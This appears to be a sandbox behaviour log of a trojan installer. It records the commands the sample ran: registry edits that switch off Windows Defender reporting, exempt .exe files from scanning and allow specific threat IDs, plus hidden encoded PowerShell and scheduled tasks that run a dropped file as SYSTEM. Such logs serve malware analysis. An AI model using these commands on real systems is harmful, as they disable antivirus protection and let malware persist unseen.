Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gYzDOohkP"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gYzDOohkP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6Q /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gYzDOohkP"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gYzDOohkP"
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmpJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@91/15@9/0
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeMutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_01
